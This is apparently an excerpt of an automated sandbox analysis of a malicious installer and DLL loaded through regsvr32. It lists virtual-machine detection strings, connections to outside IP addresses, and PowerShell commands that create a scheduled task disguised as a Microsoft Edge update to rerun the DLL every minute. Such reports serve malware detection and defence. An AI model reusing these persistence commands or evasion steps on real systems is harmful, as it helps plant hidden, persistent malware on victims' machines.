Source: regsvr32.exe, 00000008.00000003.1820951709.000000000335A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.000000000335B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092606345.000000000291D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092953875.0000000002946000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2017378313.0000000002DD1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000388B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Virtual Processor
Source: powershell.exe, 00000011.00000002.2098231476.000001C80E6A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
Source: regsvr32.exe, 00000010.00000003.2331064424.000000000123C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003A03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2333007615.0000000001259000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2032234436.0000000001245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partition
Source: regsvr32.exe, 00000008.00000003.2092606345.000000000291D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092953875.0000000002946000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003985000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2332847185.00000000011DB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003885000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processorys
Source: regsvr32.exe, 00000010.00000003.1993427043.0000000002C23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.1973208647.00000000012B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flus
Source: regsvr32.exe, 00000010.00000003.2331064424.000000000123C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003A03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2333007615.0000000001259000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2032234436.0000000001245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092606345.000000000291D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092953875.0000000002946000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2332362864.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2332847185.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003985000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003885000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: JHyper-V Hypervisor Logical Processor
Source: regsvr32.exe, 00000008.00000003.2092606345.000000000291D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092953875.0000000002946000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2332362864.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2332847185.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003985000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003885000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: sWDHyper-V Hypervisor Root Partition
Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092606345.000000000291D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092953875.0000000002946000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2332362864.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2332847185.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003985000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003885000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: DHyper-V Hypervisor Root Partition
Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2331064424.000000000123C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003A03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2333007615.0000000001259000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2032234436.0000000001245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003909000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: &Hyper-V Hypervisor
Source: regsvr32.exe, 00000008.00000003.1820951709.000000000335A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.000000000335B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2017378313.0000000002DD1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000388B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Hypervisor Logical Processor.mui`
Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2331064424.000000000123C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003A03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2333007615.0000000001259000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2032234436.0000000001245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003909000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V wwqkrpglnloojsk Bus Pipes
Source: regsvr32.exe, 00000010.00000003.2020259374.0000000002E3F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: NECVMWar VMware SATA CD00\w
Source: regsvr32.exe, 00000010.00000003.2020259374.0000000002E3F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: regsvr32.exe, 00000008.00000003.1820951709.000000000335A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.000000000335B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092606345.000000000291D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092953875.0000000002946000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2017378313.0000000002DD1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2332362864.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000388B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2332847185.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003985000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003885000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Virtual Machine Bus Pipesl
Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092606345.000000000291D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092953875.0000000002946000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2332362864.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2332847185.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003985000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003885000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: AlDHyper-V Virtual Machine Bus Pipes
Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: X2Hyper-V VM Vid Partitionj
Source: powershell.exe, 00000011.00000002.2098231476.000001C80E6A8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter
Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Hypervisor Logical Processor.mui
Source: regsvr32.exe, 00000008.00000003.1820951709.000000000335A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.000000000335B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2331064424.000000000123C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2017378313.0000000002DD1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000388B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003A03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2333007615.0000000001259000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Hypervisor
Source: regsvr32.exe, 00000010.00000003.2331064424.000000000123C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003A03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2333007615.0000000001259000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2032234436.0000000001245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003909000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: THyper-V Hypervisor Root Virtual Processorem32#
Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: THyper-V Hypervisor Root Virtual Processor7;
Source: regsvr32.exe, 00000008.00000003.2092606345.000000000291D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092953875.0000000002946000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2332362864.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2332847185.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003985000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003885000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Virtual Machine Bus PipessJ
Source: regsvr32.exe, 00000008.00000003.2092606345.000000000291D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092953875.0000000002946000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2332362864.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2332847185.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003985000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003885000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Hypervisor Root Partition$
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp | Process information queried: ProcessInformation
Source: C:\Windows\System32\regsvr32.exe | Code function: 16_2_00007FFDFB206890 memset,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,AddVectoredExceptionHandler,NtQueryInformationProcess,NtQuerySystemInformation,NtOpenThread,NtGetContextThread,NtSetContextThread,NtClose,16_2_00007FFDFB206890
Source: C:\Windows\System32\regsvr32.exe | Code function: 16_2_00007FFDFB21DBC0 GetProcessTimes,GetSystemTimes,GetProcessIoCounters,OpenProcessToken,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,CloseHandle,NtQueryInformationProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,memcpy,ReadProcessMemory,ReadProcessMemory,memset,GetModuleFileNameExW,K32GetModuleFileNameExW,VirtualQueryEx,RtlFreeHeap,GetProcessTimes,16_2_00007FFDFB21DBC0
Source: C:\Windows\System32\regsvr32.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\regsvr32.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\regsvr32.exe | Network Connect: 154.216.19.129 58001
Source: C:\Windows\System32\regsvr32.exe | Network Connect: 93.93.131.124 443
Source: C:\Windows\System32\regsvr32.exe | Thread register set: 7688 5
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 3
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" /VERYSILENT /SUPPRESSMSGBOXES
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{D7C2DB06-FCF6-4992-AF37-53F140CD5A88}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:install c:\users\user\appdata\roaming\poisedcoyote.dll\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{d7c2db06-fcf6-4992-af37-53f140cd5a88}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries) -runlevel highest"
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:install c:\users\user\appdata\roaming\poisedcoyote.dll\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{d7c2db06-fcf6-4992-af37-53f140cd5a88}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries) -runlevel highest"
Source: regsvr32.exe, 00000008.00000003.2088977331.000000000338C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2021256685.00000000038FA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2321313066.00000000038BD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
